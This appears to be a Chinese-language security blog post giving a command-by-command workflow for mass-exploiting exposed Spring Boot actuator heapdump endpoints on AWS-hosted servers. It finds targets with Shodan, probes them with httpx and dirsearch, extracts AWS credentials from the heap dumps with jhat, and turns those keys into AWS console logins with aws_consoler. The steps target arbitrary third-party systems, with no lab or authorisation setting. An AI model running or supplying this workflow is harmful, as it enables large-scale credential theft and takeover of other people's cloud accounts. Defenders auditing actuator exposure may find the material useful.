#原创文章#
0x01 引言

全球云厂商有很多,本文主要针对Spring Boot信息泄露在aws上的利用。
0x02 正文
1) 用shodan分析spring boot服务器在asn上分布的情况
https://beta.shodan.io/search/facet?query=http.favicon.hash%3A116323821&facet=asn

aws的服务器主要分布在as16509和as14618。
2) 通过shodan命令行下载数据
as16509:
shodan download as16509 'http.favicon.hash:116323821 asn:"as16509"' --limit -1
as14618:
shodan download as14618 'http.favicon.hash:116323821 asn:"as14618"' --limit -1
3) 通过httpx探测存活的url
shodan parse --fields ip_str,port --separator : as16509.json.gz | httpx -silent -o as16509.txt
4) 利用dirsearch扫描存在的heapdump文件
heapdump
actuator/heapdump
management/heapdump
python3 dirsearch.py -L as16509.txt -w wordlist.txt -e *
cat reports/BATCH-21-03-1616-47-59/ | grep MB

5)利用jhat分析heapdump
jhat -port 7001 heapdump
主要通过以下关键词来寻找凭证:
- 关键词1: com.amazonaws.auth.BasicAWSCredentials


- 关键词2 :com.amazonaws.auth.BasicSessionCredentials

6)利用aws_consoler来伪造aws控制台登陆凭证。凭证能否生成和所拥有的权限大小,取决于iam所分配的权限。
aws_consoler -v -a <accessKey> -s <secretKey>
aws_consoler -v -a <awsAccessKey> -s <awsSecretKey> -t <sessionToken>

复制url到浏览器中执行,成功登陆到AWS控制台。

ps: 非常感谢我的好朋友老八,渗透界的扛把子,给我推荐的aws_consoler这款工具。

0x03 参考
本文迁移自知识星球“火线Zone”